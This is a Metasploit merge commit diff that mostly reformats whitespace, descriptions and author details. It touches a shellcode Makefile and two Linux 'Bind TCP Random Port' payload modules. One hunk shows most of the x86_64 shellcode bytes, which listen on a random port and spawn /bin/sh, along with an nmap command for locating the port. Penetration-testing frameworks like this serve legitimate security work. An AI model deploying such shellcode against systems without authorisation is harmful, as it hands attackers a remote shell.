Merge pull request #1 from todb-r7/pr2350-fix-random-bind-port-shellcode
Fixes for #2350, random bind shellcodebug/bundler_fix
commit
81d82a77e8
|
@ -1,11 +1,11 @@
|
|||
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
|
||||
stager_egghunt stager_sock_find stager_sock_reverse \
|
||||
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
||||
stager_egghunt stager_sock_find stager_sock_reverse \
|
||||
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
||||
stager_sock_reverse_udp_dns
|
||||
STAGES=stage_tcp_shell stage_udp_shell
|
||||
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
|
||||
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
|
||||
single_shell_bind_tcp_random_port
|
||||
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
|
||||
single_shell_bind_tcp_random_port
|
||||
|
||||
OBJS=${STAGERS} ${STAGES} ${SINGLE}
|
||||
|
||||
|
@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
|
|||
@ruby -p -a -e ' \
|
||||
$$F.shift; \
|
||||
$$F[0].tap { |s| \
|
||||
s.tr! "A-F", "a-f"; \
|
||||
t=s.dup; \
|
||||
s.clear; \
|
||||
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
||||
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
||||
s.tr! "A-F", "a-f"; \
|
||||
t=s.dup; \
|
||||
s.clear; \
|
||||
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
||||
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
||||
}; \
|
||||
$$_ = $$F.join(" ") + "\n"; \
|
||||
' < $*.tmp > $@
|
||||
|
|
|
@ -15,11 +15,13 @@ module Metasploit3
|
|||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
||||
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
|
||||
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
|
||||
'Assembly source: http://goo.gl/TAveVc',
|
||||
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
|
||||
'Description' => %q{
|
||||
Listen for a connection in a random port and spawn a command shell.
|
||||
Use nmap to discover the open port: 'nmap -sS target -p-'.
|
||||
},
|
||||
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'Payload' =>
|
||||
|
@ -31,21 +33,21 @@ module Metasploit3
|
|||
"\x6a\x02" +# pushq $0x2
|
||||
"\x5f" +# pop %rdi
|
||||
"\xb0\x29" +# mov $0x29,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\x52" +# push %rdx
|
||||
"\x5e" +# pop %rsi
|
||||
"\x50" +# push %rax
|
||||
"\x5f" +# pop %rdi
|
||||
"\xb0\x32" +# mov $0x32,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\xb0\x2b" +# mov $0x2b,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\x57" +# push %rdi
|
||||
"\x5e" +# pop %rsi
|
||||
"\x48\x97" +# xchg %rax,%rdi
|
||||
"\xff\xce" +# dec %esi
|
||||
"\xb0\x21" +# mov $0x21,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\x75\xf8" +# jne 40009f
|
||||
"\x52" +# push %rdx
|
||||
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
|
||||
|
@ -54,7 +56,7 @@ module Metasploit3
|
|||
"\x54" +# push %rsp
|
||||
"\x5f" +# pop %rdi
|
||||
"\xb0\x3b" +# mov $0x3b,%al
|
||||
"\x0f\x05" # syscall
|
||||
"\x0f\x05" # syscall
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -15,11 +15,13 @@ module Metasploit3
|
|||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
||||
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
|
||||
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
|
||||
'Assembly source: http://goo.gl/V5OObo',
|
||||
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
|
||||
'Description' => %q{
|
||||
Listen for a connection in a random port and spawn a command shell.
|
||||
Use nmap to discover the open port: 'nmap -sS target -p-'.
|
||||
},
|
||||
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
|
|
Loading…
Reference in New Issue